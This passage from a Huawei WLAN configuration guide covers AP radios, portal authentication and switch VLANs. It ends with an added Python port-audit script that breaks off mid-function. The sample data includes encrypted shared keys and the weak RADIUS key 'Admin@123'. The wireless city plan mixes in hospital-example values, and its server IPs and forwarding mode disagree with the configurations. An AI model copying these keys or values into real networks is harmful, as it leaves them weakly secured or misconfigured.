[AC-wlan-ap-101] wired-port-profile wired2 gigabitethernet 0
[AC-wlan-ap-101] quit
[AC-wlan-view] ap-id 102
[AC-wlan-ap-102] wired-port-profile wired1 ethernet 0
[AC-wlan-ap-102] wired-port-profile wired1 ethernet 1
[AC-wlan-ap-102] wired-port-profile wired2 gigabitethernet 0
[AC-wlan-ap-102] quit
[AC-wlan-view] ap-id 201
[AC-wlan-ap-201] wired-port-profile wired3 ethernet 0
[AC-wlan-ap-201] wired-port-profile wired3 ethernet 1
[AC-wlan-ap-201] wired-port-profile wired4 gigabitethernet 0
[AC-wlan-ap-201] quit
[AC-wlan-view] ap-id 202
[AC-wlan-ap-202] wired-port-profile wired3 ethernet 0
[AC-wlan-ap-202] wired-port-profile wired3 ethernet 1
[AC-wlan-ap-202] wired-port-profile wired4 gigabitethernet 0
[AC-wlan-ap-202] quit

Step 5 Configure WLAN service parameters.

# Create RRM profile rrm1.
[AC-wlan-view] rrm-profile name rrm1
[AC-wlan-rrm-prof-rrm1] calibrate auto-channel-select disable //Set the channel mode of the radio to fixed.
[AC-wlan-rrm-prof-rrm1] calibrate auto-txpower-select disable //Set the power mode of the radio to fixed.
[AC-wlan-rrm-prof-rrm1] quit

# Create radio profiles radio-2g and radio-5g and bind rrm1 to both radio profiles.
[AC-wlan-view] radio-2g-profile name radio-2g
[AC-wlan-radio-2g-prof-radio-2g] rrm-profile rrm1
[AC-wlan-radio-2g-prof-radio-2g] quit
[AC-wlan-view] radio-5g-profile name radio-5g
[AC-wlan-radio-5g-prof-radio-5g] rrm-profile rrm1
[AC-wlan-radio-5g-prof-radio-5g] quit

# Create security profile wlan-security and set the security policy in the profile.
[AC-wlan-view] security-profile name wlan-security //Portal authentication has been enabled on the interface. Set the security policy to OPEN (default setting), that is, no authentication and no encryption.
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to hospital-wlan.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid hospital-wlan //Set the SSID to hospital-wlan.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit

# Create traffic profile traffic1 and configure Layer 2 user isolation.
[AC-wlan-view] traffic-profile name traffic1
[AC-wlan-traffic-prof-traffic1] user-isolate l2
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-traffic-prof-traffic1] quit

# Create VAP profiles wlan-vap1 and wlan-vap2, configure the data forwarding mode and
service VLANs, and apply the security profile, SSID profile, authentication profile, and
traffic profile to each VAP profile.
[AC-wlan-view] vap-profile name wlan-vap1
[AC-wlan-vap-prof-wlan-vap1] forward-mode tunnel //Set the service forwarding mode to tunnel.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap1] service-vlan vlan-id 101 //Set the service VLAN ID to 101. By default, the VLAN ID is 1.
[AC-wlan-vap-prof-wlan-vap1] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap1] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap1] authentication-profile portal1
[AC-wlan-vap-prof-wlan-vap1] traffic-profile traffic1
[AC-wlan-vap-prof-wlan-vap1] quit
[AC-wlan-view] vap-profile name wlan-vap2
[AC-wlan-vap-prof-wlan-vap2] forward-mode tunnel //Set the service forwarding mode to tunnel.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap2] service-vlan vlan-id 102
[AC-wlan-vap-prof-wlan-vap2] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap2] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap2] authentication-profile portal1
[AC-wlan-vap-prof-wlan-vap2] traffic-profile traffic1
[AC-wlan-vap-prof-wlan-vap2] quit

# Bind the VAP profiles and radio profiles to the AP groups.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap1 wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap1 wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] radio-2g-profile radio-2g
[AC-wlan-ap-group-ap-group1] radio-5g-profile radio-5g
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] ap-group name ap-group2
[AC-wlan-ap-group-ap-group2] vap-profile wlan-vap2 wlan 1 radio 0
[AC-wlan-ap-group-ap-group2] vap-profile wlan-vap2 wlan 1 radio 1
[AC-wlan-ap-group-ap-group2] radio-2g-profile radio-2g
[AC-wlan-ap-group-ap-group2] radio-5g-profile radio-5g
[AC-wlan-ap-group-ap-group2] quit

Step 6 Configure VAPs and deliver VAP parameters to the APs.

# Configure VAPs.
[AC-wlan-view] ap-id 101
[AC-wlan-ap-101] radio 0
[AC-wlan-radio-101/0] channel 20mhz 1 //Configure the channel based on the planning result of the WLAN Planner.
[AC-wlan-radio-101/0] eirp 10 //Configure the power based on the planning result of the WLAN Planner.
[AC-wlan-radio-101/0] quit
[AC-wlan-ap-101] quit

[AC-wlan-view] ap-id 102
[AC-wlan-ap-102] radio 0
[AC-wlan-radio-102/0] channel 20mhz 6
[AC-wlan-radio-102/0] eirp 10
[AC-wlan-radio-102/0] quit
[AC-wlan-ap-102] quit
[AC-wlan-view] ap-id 103
[AC-wlan-ap-103] radio 0
[AC-wlan-radio-103/0] channel 20mhz 11
[AC-wlan-radio-103/0] eirp 10
[AC-wlan-radio-103/0] quit
[AC-wlan-ap-103] quit
[AC-wlan-view] ap-id 103
[AC-wlan-ap-103] radio 1 //The AP5030 supports two radios. This step configures radio 1.
[AC-wlan-radio-103/1] channel 20mhz 153
[AC-wlan-radio-103/1] eirp 10
[AC-wlan-radio-103/1] quit
[AC-wlan-ap-103] quit
[AC-wlan-view] ap-id 201
[AC-wlan-ap-201] radio 0
[AC-wlan-radio-201/0] channel 20mhz 1
[AC-wlan-radio-201/0] eirp 10
[AC-wlan-radio-201/0] quit
[AC-wlan-ap-201] quit
[AC-wlan-view] ap-id 202
[AC-wlan-ap-202] radio 0
[AC-wlan-radio-202/0] channel 20mhz 6
[AC-wlan-radio-202/0] eirp 10
[AC-wlan-radio-202/0] quit
[AC-wlan-ap-202] quit
[AC-wlan-view] ap-id 203
[AC-wlan-ap-203] radio 0
[AC-wlan-radio-203/0] channel 20mhz 11
[AC-wlan-radio-203/0] eirp 10
[AC-wlan-radio-203/0] quit
[AC-wlan-ap-203] quit
[AC-wlan-view] ap-id 203
[AC-wlan-ap-203] radio 1
[AC-wlan-radio-203/1] channel 20mhz 157
[AC-wlan-radio-203/1] eirp 10
[AC-wlan-radio-203/1] quit
[AC-wlan-ap-203] quit

# Deliver the configuration to the APs.
[AC-wlan-view] commit all //The WLAN service configuration made on the AC takes effect only after it is delivered to the APs.
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 7 Verify the configuration.

# After the configuration is complete, run the display vap all command. The command output shows that the VAPs have been created.
[AC-wlan-view] display vap all
WID : WLAN ID
----------------------------------------------------------------------------------
AP ID AP name RfID WID BSSID Status Auth type STA SSID
----------------------------------------------------------------------------------
101 ap-101 0 1 60DE-4476-E320 ON OPEN 0 hospital-wlan
102 ap-102 0 1 60DE-4476-E340 ON OPEN 0 hospital-wlan
103 ap-103 0 1 DCD2-FC04-B520 ON OPEN 0 hospital-wlan
103 ap-103 1 1 DCD2-FC04-B530 ON OPEN 0 hospital-wlan
201 ap-201 0 1 60DE-4476-E360 ON OPEN 0 hospital-wlan
202 ap-202 0 1 60DE-4476-E380 ON OPEN 0 hospital-wlan
203 ap-203 0 1 DCD2-FC04-B540 ON OPEN 0 hospital-wlan
203 ap-203 1 1 DCD2-FC04-B550 ON OPEN 0 hospital-wlan
---------------------------------------------------------------------------------
Total: 8

# STAs discover the WLAN with the SSID hospital-wlan and associate with the WLAN. The
STAs are allocated IP addresses. After you enter the key, the STAs can access the wireless
network. Run the display station all command on the AC. The command output shows that
the STAs have connected to the WLAN hospital-wlan.
[AC-wlan-view] display station all
Rf/WLAN: Radio ID/WLAN ID
Rx/Tx: link receive rate/link transmit rate(Mbps)
----------------------------------------------------------------------------------------------------------
STA MAC AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address SSID
----------------------------------------------------------------------------------------------------------
14cf-9208-9abf 0 ap-101 0/1 2.4G 11n 3/8 -70 10 10.23.101.254 hospital-wlan
----------------------------------------------------------------------------------------------------------
Total: 1 2.4G: 1 5G: 0

# STAs and PCs obtain IP addresses and connect to the network normally.

----End

Configuration Files
l Configuration file of the S5700-1 connected to wired users
#
sysname S5700-1
#
vlan batch 100 201
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100 201
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 201
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 201
port-isolate enable group 1
#
interface GigabitEthernet0/0/4
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 201
port-isolate enable group 1
#
return

l Configuration file of the S5700-2 connected to wireless users
#
sysname S5700-2
#
vlan batch 100 202
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk allow-pass vlan 100 202
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 202
port-isolate enable group 1
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 202
port-isolate enable group 1
#
interface GigabitEthernet0/0/4
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100 202
port-isolate enable group 1
#
return
l Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 102 200 to 202 300
#
authentication-profile name portal1
portal-access-profile portal1
access-domain portal1
access-domain portal1 force
#
dhcp enable
#
radius-server template radius1
radius-server shared-key cipher %^%#ZGx{:~QFtUUhhG!`ba-PTj=H1p_J<1/%ZAXuB5)0%^%#
radius-server authentication 10.23.200.1 1812 source ip-address 10.23.200.2 weight 80
radius-server accounting 10.23.200.1 1813 source ip-address 10.23.200.2 weight 80
undo radius-server user-name domain-included
radius-server authorization 10.23.200.1 shared-key cipher %^%#w]=@OYp:T9"u@{I2RD4U5QJi2{u]$M{]DND|;=s"%^%#
#
web-auth-server portal1
server-ip 10.23.200.1
port 50100
shared-key cipher %^%#yJ0=%9W@FVMN/=HIR9EN@1abUN6>a(Bn@MHR7Bl4%^%#
url http://10.23.200.1:8080/portal
#
portal-access-profile name portal1
web-auth-server portal1 direct
#
aaa
authentication-scheme radius1
authentication-mode radius
accounting-scheme radius1
accounting-mode radius
domain portal1
authentication-scheme radius1
accounting-scheme radius1
radius-server radius1
#
interface Vlanif100
description manage_ap
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
description manage_floor1_sta
ip address 10.23.101.1 255.255.255.0
dhcp select interface
#
interface Vlanif102
description manage_floor2_sta
ip address 10.23.102.1 255.255.255.0
dhcp select interface
#
interface Vlanif200
ip address 10.23.200.2 255.255.255.0
#
interface Vlanif201
description manage_floor1_pc
ip address 10.23.201.1 255.255.255.0
dhcp select interface
#
interface Vlanif202
description manage_floor2_pc
ip address 10.23.202.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100 201
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 100 202
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 200
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 300
#
capwap source interface vlanif100
#
wlan
traffic-profile name traffic1
user-isolate l2
security-profile name wlan-security
ssid-profile name wlan-ssid
ssid hospital-wlan
vap-profile name wlan-vap1
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
traffic-profile traffic1
authentication-profile portal1
vap-profile name wlan-vap2
forward-mode tunnel
service-vlan vlan-id 102
ssid-profile wlan-ssid
security-profile wlan-security
traffic-profile traffic1
authentication-profile portal1
regulatory-domain-profile name domain1
rrm-profile name rrm1
calibrate auto-channel-select disable
calibrate auto-txpower-select disable
radio-2g-profile name radio-2g
rrm-profile rrm1
radio-5g-profile name radio-5g
rrm-profile rrm1
wired-port-profile name wired1
vlan pvid 201
vlan untagged 201
wired-port-profile name wired2
vlan tagged 201
wired-port-profile name wired3
vlan pvid 202
vlan untagged 202
wired-port-profile name wired4
vlan tagged 202
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap1 wlan 1
radio 1
radio-5g-profile radio-5g
vap-profile wlan-vap1 wlan 1
radio 2
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap1 wlan 1
ap-group name ap-group2
regulatory-domain-profile domain1
radio 0
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap2 wlan 1
radio 1
radio-5g-profile radio-5g
vap-profile wlan-vap2 wlan 1
radio 2
radio-2g-profile radio-2g
radio-5g-profile radio-5g
vap-profile wlan-vap2 wlan 1
ap-id 101 type-id 19 ap-mac 60de-4476-e320 ap-sn 210235419610CB002378
ap-name ap-101
ap-group ap-group1
wired-port-profile wired1 ethernet 0
wired-port-profile wired1 ethernet 1
wired-port-profile wired2 gigabitethernet 0
radio 0
channel 20mhz 1
eirp 10
ap-id 102 type-id 19 ap-mac 60de-4476-e340 ap-sn 210235419610CB002204
ap-name ap-102
ap-group ap-group1
wired-port-profile wired1 ethernet 0
wired-port-profile wired1 ethernet 1
wired-port-profile wired2 gigabitethernet 0
radio 0
channel 20mhz 6
eirp 10
ap-id 103 type-id 19 ap-mac dcd2-fc04-b520 ap-sn 210235419610CB002561
ap-name ap-103
ap-group ap-group1
radio 0
channel 20mhz 11
eirp 10
radio 1
channel 20mhz 153
eirp 10
ap-id 201 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235419610CB002287
ap-name ap-201
ap-group ap-group2
wired-port-profile wired3 ethernet 0
wired-port-profile wired3 ethernet 1
wired-port-profile wired4 gigabitethernet 0
radio 0
channel 20mhz 1
eirp 10
ap-id 202 type-id 19 ap-mac 60de-4476-e380 ap-sn 210235419610CB002984
ap-name ap-202
ap-group ap-group2
wired-port-profile wired3 ethernet 0
wired-port-profile wired3 ethernet 1
wired-port-profile wired4 gigabitethernet 0
radio 0
channel 20mhz 6
eirp 10
ap-id 203 type-id 19 ap-mac dcd2-fc04-b540 ap-sn 210235419610CB002632
ap-name ap-203
ap-group ap-group2
radio 0
channel 20mhz 11
eirp 10
radio 1
channel 20mhz 157
eirp 10
#
return

16.5 Example for Configuring WLAN Services for a Wireless City Project (AC Bypass Deployment, Portal Authentication)

WLAN Service Overview

You can configure WLAN services to allow wireless users to easily access a wireless network and move around within the coverage area of the wireless network.

Configuration Notes
l In this example, Portal authentication is used. To ensure network security, configure an
appropriate security policy according to service requirements.
l If direct forwarding is used, configure port isolation on the interfaces directly connected to APs. If port isolation is not configured, a large number of broadcast packets will be transmitted in the VLANs, and WLAN users on different APs can communicate directly at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In addition, wireless links are unstable. To ensure stable transmission of multicast packets, they are usually sent at low rates. If a large number of such multicast packets are sent from the network side, the air interfaces may be congested. You are advised to configure multicast packet suppression to reduce the impact of a large number of low-rate multicast packets on the wireless network. Exercise caution when configuring the rate limit; otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-9 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R009C00 | S12700 | V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D, AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R009C00 | S12700 | V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D
V200R009C00 | S12700 | V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US, AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN, AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
A city needs to deploy the wireless smart city project and requires that Portal authentication
be used for wireless users in the coverage area of the wireless network. Since a large number
of wireless users exist, high wireless service performance and Portal authentication
performance are required.
As shown in Figure 16-4, the S9700 core switch functions as the gateway for STAs and APs and as the DHCP server to assign IP addresses to STAs and APs. The S9700 connects to APs through PoE access switches S5700-1 and S5700-2. The AC and APs are located on a Layer 3 network. The AC is the X series card on the S9700 and is connected to the S9700 through an Eth-Trunk in bypass mode.

To facilitate network planning and management, the access switches are only used to transparently transmit data at Layer 2.

Figure 16-4 Networking diagram for configuring WLAN services for a wireless city project

[Figure: the Internet connects through a Router to the S9700 core switch. The AC (GE2/0/1 and GE2/0/2) and the Controller attach to the S9700 (GE1/0/5 and GE1/0/6, and GE1/0/3); GE1/0/4 leads to the upper-layer network. The S9700 connects through GE1/0/1 to S5700-1 GE0/0/1 and through GE1/0/2 to S5700-2 GE0/0/1. S5700-1 GE0/0/2 and GE0/0/3 connect to AP101 and AP102; S5700-2 GE0/0/2 and GE0/0/3 connect to AP201 and AP202.]

Data Planning

Table 16-10 Network data planning

Item | Interface | VLAN | Description
AC | Eth-Trunk1 | 100 | Configured to improve network bandwidth and reliability. Add GE2/0/1 and GE2/0/2 to Eth-Trunk 1 and connect the two interfaces to the S9700.
S5700-1 | GE0/0/1 | 10, 101 | Connected to the AC
S5700-1 | GE0/0/2 | 10, 101 | Connected to AP101
S5700-1 | GE0/0/3 | 10, 101 | Connected to AP102
S5700-2 | GE0/0/1 | 20, 102 | Connected to the AC
S5700-2 | GE0/0/2 | 20, 102 | Connected to AP201
S5700-2 | GE0/0/3 | 20, 102 | Connected to AP202
S9700 | GE1/0/1 | 10, 101 | Connected to the S5700-1
S9700 | GE1/0/2 | 20, 102 | Connected to the S5700-2
S9700 | GE1/0/3 | 300 | Connected to the Controller
S9700 | GE1/0/4 | 101, 102 | Connected to the upper-layer network
S9700 | Eth-Trunk1 | 100 | Configured to improve network bandwidth and reliability. Add GE1/0/5 and GE1/0/6 to Eth-Trunk 1 and connect the two interfaces to the AC.

Table 16-11 Service data planning

Item | Data | Description
IP address of the AC's source interface | 10.23.100.1/24 | -
AP group | Name: ap-group1; referenced profiles: VAP profile wlan-vap1, regulatory domain profile domain1, and radio profiles radio-2g and radio-5g | -
AP group | Name: ap-group2; referenced profiles: VAP profile wlan-vap2, regulatory domain profile domain1, and radio profiles radio-2g and radio-5g | -
Portal access profile | Name: portal1; referenced profiles: Portal server templates portal1 and portal3 | -
Portal access profile | Name: portal2; referenced profiles: Portal server templates portal2 and portal3 | -
Authentication profile | Name: portal1; referenced profile: Portal access profile portal1 | -
Authentication profile | Name: portal2; referenced profile: Portal access profile portal2 | -
Regulatory domain profile | Name: domain1; country code: CN | -
RRM profile | Name: rrm1 | -
Radio profile | Name: radio-2g or radio-5g; referenced profile: RRM profile rrm1 | -
Security profile | Name: wlan-security; security and authentication policy: OPEN | -
SSID profile | Name: wlan-ssid; SSID: hospital-wlan | -
Traffic profile | Name: traffic1 | -
VAP profile | Name: wlan-vap1; SSID: city-wlan; service data forwarding mode: direct forwarding; service VLAN: VLAN 101; referenced profiles: security profile wlan-security, SSID profile wlan-ssid, authentication profile portal1, and traffic profile traffic1 | Provides WLAN network coverage for Area1.
VAP profile | Name: wlan-vap2; SSID: city-wlan; service data forwarding mode: direct forwarding; service VLAN: VLAN 102; referenced profiles: security profile wlan-security, SSID profile wlan-ssid, authentication profile portal1, and traffic profile traffic1 | Provides WLAN network coverage for Area2.
DHCP server | The S9700 functions as the DHCP server to assign IP addresses to APs and STAs. | -
AP gateway and IP address pool range | VLANIF10: 10.23.10.1/24, 10.23.10.2-10.23.10.254/24 | Gateway and IP address pool for AP101 and AP102
AP gateway and IP address pool range | VLANIF20: 10.23.20.1/24, 10.23.20.2-10.23.20.254/24 | Gateway and IP address pool for AP201 and AP202
STA gateway and IP address pool range | VLANIF101: 10.23.101.1/24, 10.23.101.2-10.23.101.254/24 | -
STA gateway and IP address pool range | VLANIF102: 10.23.102.1/24, 10.23.102.2-10.23.102.254/24 | -
Server parameters (authentication server) | Active IP address: 10.23.30.1; active IP address: 10.23.30.2; standby IP address: 10.23.30.3; port number: 1812; RADIUS shared key: Admin@123 | Three Service Controllers (SCs) are deployed on the network. Controller1 and Controller2 are used for load balancing, and Controller3 serves as a backup for Controller1 and Controller2. The Service Controller (SC) of the Agile Controller provides RADIUS server and Portal server functions; therefore, the IP addresses of the authentication server, accounting server, authorization server, and Portal server are all the IP address of the SC.
Server parameters (accounting server) | Active IP address: 10.23.30.1; active IP address: 10.23.30.2; standby IP address: 10.23.30.3; port number: 1813; RADIUS shared key: Admin@123 | Configure a RADIUS accounting server to collect user login and logout information. The port numbers of the authentication server and accounting server must be the same as those of the RADIUS server.
Server parameters (authorization server) | Active IP address: 10.23.30.1; active IP address: 10.23.30.2; standby IP address: 10.23.30.3; RADIUS shared key: Admin@123 | Configure an authorization server to enable the RADIUS server to deliver authorization rules to the AC. The shared key of the authorization server must be the same as those of the authentication server and accounting server.
Server parameters (Portal server) | Active IP address: 10.23.30.1; active IP address: 10.23.30.2; standby IP address: 10.23.30.3; port number that the AC uses to listen on Portal protocol packets: 2000; destination port number in the packets that the AC sends to the Portal server: 50100; Portal shared key: Admin@123; encryption key for the URL parameters that the AC sends to the Portal server: Admin@123 | -

Table 16-12 Radio channel data planning

Item | Data | Description
AP101 | Radio 0: channel 1 and power level 10; Radio 1: channel 153 and power level 10 | Use the WLAN Planner to plan AP installation locations, and the working channel and power of the AP radio. Set the channel mode and power mode to fixed, and configure the channel and power for each AP.
AP102 | Radio 0: channel 6 and power level 10; Radio 1: channel 161 and power level 10 | Same as for AP101
AP201 | Radio 0: channel 1 and power level 10; Radio 1: channel 153 and power level 10 | Same as for AP101
AP202 | Radio 0: channel 6 and power level 10; Radio 1: channel 161 and power level 10 | Same as for AP101

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure all network devices to enable the APs, S5700-1, S5700-2, S9700, and AC to
communicate with upper-layer devices.
2. Configure the S9700 as a DHCP server to assign IP addresses to the STAs and APs.
3. Configure a RADIUS server template with authentication, accounting, and authorization servers, and configure Portal authentication.
4. Configure basic WLAN services, including AC system parameters, AP management, and
WLAN service parameters.
5. Configure VAPs and deliver VAP parameters to APs.
6. Verify the configuration to ensure that both wired and wireless users can access the
Internet.

Procedure
Step 1 Configure network devices to communicate with each other.
# Add interfaces GE0/0/1 to GE0/0/3 of the S5700-1 to VLAN 10 (management VLAN) and VLAN 101 (service VLAN). Set PVIDs on the interfaces directly connected to APs; you are also advised to configure port isolation on these interfaces to reduce broadcast packets.
[HUAWEI] sysname S5700-1
[S5700-1] vlan batch 10 101
[S5700-1] interface gigabitethernet 0/0/1
[S5700-1-GigabitEthernet0/0/1] port link-type trunk
[S5700-1-GigabitEthernet0/0/1] port trunk allow-pass vlan 10 101
[S5700-1-GigabitEthernet0/0/1] quit
[S5700-1] interface gigabitethernet 0/0/2
[S5700-1-GigabitEthernet0/0/2] port link-type trunk
[S5700-1-GigabitEthernet0/0/2] port trunk allow-pass vlan 10 101
[S5700-1-GigabitEthernet0/0/2] port trunk pvid vlan 10 //Set a PVID for the interface directly connected to the AP.
[S5700-1-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation to reduce broadcast packets.
[S5700-1-GigabitEthernet0/0/2] quit
[S5700-1] interface gigabitethernet 0/0/3
[S5700-1-GigabitEthernet0/0/3] port link-type trunk
[S5700-1-GigabitEthernet0/0/3] port trunk allow-pass vlan 10 101
[S5700-1-GigabitEthernet0/0/3] port trunk pvid vlan 10
[S5700-1-GigabitEthernet0/0/3] port-isolate enable
[S5700-1-GigabitEthernet0/0/3] quit

# Add interfaces GE0/0/1 to GE0/0/3 of the S5700-2 to VLAN 20 (management VLAN) and VLAN 102 (service VLAN). Set PVIDs on the interfaces directly connected to APs; you are also advised to configure port isolation on these interfaces to reduce broadcast packets.
[HUAWEI] sysname S5700-2
[S5700-2] vlan batch 20 102
[S5700-2] interface gigabitethernet 0/0/1
[S5700-2-GigabitEthernet0/0/1] port link-type trunk
[S5700-2-GigabitEthernet0/0/1] port trunk allow-pass vlan 20 102
[S5700-2-GigabitEthernet0/0/1] quit
[S5700-2] interface gigabitethernet 0/0/2
[S5700-2-GigabitEthernet0/0/2] port link-type trunk
[S5700-2-GigabitEthernet0/0/2] port trunk allow-pass vlan 20 102
[S5700-2-GigabitEthernet0/0/2] port trunk pvid vlan 20 //Set a PVID for the interface directly connected to the AP.
[S5700-2-GigabitEthernet0/0/2] port-isolate enable //Configure port isolation to reduce broadcast packets.
[S5700-2-GigabitEthernet0/0/2] quit
[S5700-2] interface gigabitethernet 0/0/3
[S5700-2-GigabitEthernet0/0/3] port link-type trunk
[S5700-2-GigabitEthernet0/0/3] port trunk allow-pass vlan 20 102
[S5700-2-GigabitEthernet0/0/3] port trunk pvid vlan 20
[S5700-2-GigabitEthernet0/0/3] port-isolate enable
[S5700-2-GigabitEthernet0/0/3] quit
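The configuration notes require port isolation, a management-VLAN PVID, and allow-pass coverage of both the management and service VLANs on every AP-facing port in direct forwarding mode, and the S5700 blocks above apply those settings by hand. As an added check that is not part of the Huawei document, the following Python script parses a configuration file in the '#'-delimited format shown under Configuration Files and reports each AP-facing port that misses one of those settings; the sample configuration, the AP port list and the VLAN numbers are constructed for the example.

```python
# Added example (not from the Huawei document): audit the AP-facing ports of an
# access switch written in the '#'-delimited VRP configuration-file format.

# Constructed sample: S5700-1 with the uplink on GE0/0/1 and two AP-facing
# ports; GE0/0/3 is deliberately left without a PVID and port isolation.
SAMPLE_CONFIG = """\
#
sysname S5700-1
#
vlan batch 10 101
#
interface GigabitEthernet0/0/1
 port link-type trunk
 port trunk allow-pass vlan 10 101
#
interface GigabitEthernet0/0/2
 port link-type trunk
 port trunk pvid vlan 10
 port trunk allow-pass vlan 10 101
 port-isolate enable group 1
#
interface GigabitEthernet0/0/3
 port link-type trunk
 port trunk allow-pass vlan 101
#
"""

# AP-facing ports according to the (constructed) data plan for this switch.
AP_PORTS = ["GigabitEthernet0/0/2", "GigabitEthernet0/0/3"]


def parse_vrp_blocks(text):
    """Split a VRP config file into '#'-separated blocks of stripped lines."""
    blocks, current = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "#":
            if current:
                blocks.append(current)
            current = []
        elif line:
            current.append(line)
    if current:
        blocks.append(current)
    return blocks


def expand_vlan_list(tokens):
    """Expand VRP VLAN syntax such as '10 101' or '100 to 102' into a set."""
    vlans, i = set(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def interface_settings(block):
    """Collect the trunk-related settings of one 'interface' block."""
    s = {"name": block[0].split(None, 1)[1], "pvid": 1,  # VRP default PVID is 1
         "allow": set(), "isolate": False}
    for line in block[1:]:
        if line.startswith("port trunk pvid vlan "):
            s["pvid"] = int(line.split()[-1])
        elif line.startswith("port trunk allow-pass vlan "):
            s["allow"] |= expand_vlan_list(line.split()[4:])
        elif line.startswith("port-isolate enable"):
            s["isolate"] = True
    return s


def audit_ap_ports(config_text, ap_ports, mgmt_vlan, service_vlans):
    """Return {interface: [findings]} for each AP-facing port breaking a rule.
    Ports not listed in ap_ports (the uplink, for instance) are ignored; an AP
    port that has no interface block at all is reported as unconfigured."""
    findings, seen = {}, set()
    required = {mgmt_vlan} | set(service_vlans)
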